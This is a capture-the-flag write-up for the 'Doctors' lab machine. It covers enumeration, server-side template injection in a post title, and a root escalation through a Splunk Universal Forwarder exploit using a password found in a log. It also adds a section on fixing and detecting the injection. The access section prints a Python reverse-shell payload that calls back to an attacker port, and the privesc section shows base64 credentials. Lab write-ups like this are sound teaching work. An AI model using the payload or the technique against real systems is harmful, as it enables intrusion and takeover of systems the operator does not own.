Port Scanning and general enumeration (Nmap, FFuF)


Interesting. Port 8089 is splunkd. Doing some research, I found out that this port belongs to the Splunk Universal Forwarder. Let’s keep this in mind for later.

Standard enumeration of the site on port 80 doesn’t reveal anything great, but there is one interesting thing to note.


doctors.htb. Let’s add an entry for doctors.htb to our /etc/hosts file.


New things to play with! Let’s toss ffuf at this while we poke around.

ffuf -u http://doctors.htb/FUZZ -w /path/to/wordlist -c


Let’s create an account and see what this app is all about.


Testing different payloads for different exploits gave us nothing at first glance. But if we go back to the archive endpoint and check the page source, we see something interesting.


Ah! Vulnerable to SSTI!

Access (SSTI, reverse shell)

I actually covered this in a writeup for a CTF challenge from Hacktivitycon2020 called Template Shack. This time, though, instead of using slicing to find where subprocess.Popen is, we’ll use this handy payload I found on PayloadAllTheThings.


After editing it a bit so that it makes a call back to our machine:

.builtins'import'.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh", "-i"]);'").read()

Use that as the post title, put whatever you want in the body, and submit the post.

Fire up a listener on your box and reload the archive tab.
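As an added illustration (not code from this writeup), here is the root cause of the archive-page SSTI and its fix, using Jinja2 (Flask’s template engine) directly rather than Flask: the vulnerable form splices the post title into the template source, the fixed form passes it as a context variable. The function names and the `{{ 7*7 }}` probe are my own.

```python
# Added example, not from the writeup: why a post title rendered in the
# archive page led to SSTI, and what the fix looks like.
from jinja2 import Environment

# autoescape=True is what Flask uses for .html templates
env = Environment(autoescape=True)


def render_archive_vulnerable(title: str) -> str:
    """Vulnerable: user input is concatenated into the template SOURCE,
    so Jinja2 parses any {{ ... }} the user supplied as template code."""
    template_source = "<h2>" + title + "</h2>"
    return env.from_string(template_source).render()


def render_archive_fixed(title: str) -> str:
    """Fixed: the template is a constant; user input arrives as a context
    variable, so it is only ever treated as data (and HTML-escaped)."""
    return env.from_string("<h2>{{ title }}</h2>").render(title=title)


def looks_like_template_probe(value: str) -> bool:
    """Cheap detection heuristic for stored post titles or request logs:
    Jinja2 expression/statement delimiters in a free-text field."""
    return any(delim in value for delim in ("{{", "}}", "{%", "%}"))


PROBE = "{{ 7*7 }}"  # constructed, harmless arithmetic probe

if __name__ == "__main__":
    print(render_archive_vulnerable(PROBE))  # <h2>49</h2>  (expression evaluated)
    print(render_archive_fixed(PROBE))       # <h2>{{ 7*7 }}</h2>  (literal text)
    print(looks_like_template_probe(PROBE))  # True
```

The same split applies to `render_template_string` in Flask: never build its first argument from request data.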

Privesc (linPEAS, Spelunker)

So now we have a shell on the box. Let’s see what linPEAS says.

Interesting log file entry


Doesn’t look like an email address. Maybe it’s the shaun user’s password? Turns out that it is. Strange.


Let’s take a look at port 8089 again. As I mentioned earlier, it’s the Splunk Universal Forwarder. There are some exploits floating around for it, including a local privilege escalation that we’re going to use.

First, we need to update the Spelunker script, because it assumes the credentials are admin:changeme.

This is what we need to change:

Authorization: Basic YWRtaW46Y2hhbmdlbWU=


Authorization: Basic c2hhdW46R3VpdGFyMTIz

Get the script onto the box, make it executable (chmod +x) and run it.

Follow the instructions to root!